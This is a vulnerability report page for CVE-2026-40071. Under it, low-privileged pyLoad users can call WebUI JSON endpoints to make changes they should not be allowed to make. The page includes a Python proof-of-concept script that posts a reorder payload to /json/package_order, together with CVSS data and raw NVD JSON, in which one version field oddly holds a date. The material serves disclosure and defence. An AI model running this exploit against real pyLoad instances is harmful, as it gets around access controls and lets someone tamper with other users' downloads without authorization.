Security Vulnerability Report
CVE-2026-40071 CVSS 5.4 MEDIUM

CVE-2026-40071

Published: 2026-04-09 18:17:03
Last Modified: 2026-04-28 00:53:26

Description

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* - VULNERABLE
pyLoad < 0.5.0b3.dev97

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target = "http://127.0.0.1:8000"
endpoint = "/json/package_order"
url = target + endpoint

# Attacker's session (low-privilege user)
# Replace with a valid session cookie obtained after login
session_cookie = "pyload_session_id_here"
headers = {
    "Content-Type": "application/json",
    "Cookie": f"pyload_session={session_cookie}",
}

# Payload to modify the package order
# This operation should require MODIFY rights but is accepted anyway
payload = {
    "pid": 1,
    "order": 0,
}

try:
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Vulnerability exploited successfully!")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm (Exploit, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40071",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T18:17:03.367",
    "lastModified": "2026-04-28T00:53:26.420",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2026-04-13",
                "matchCriteriaId": "631877F0-7E83-469E-BC2B-244AB14E0274"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```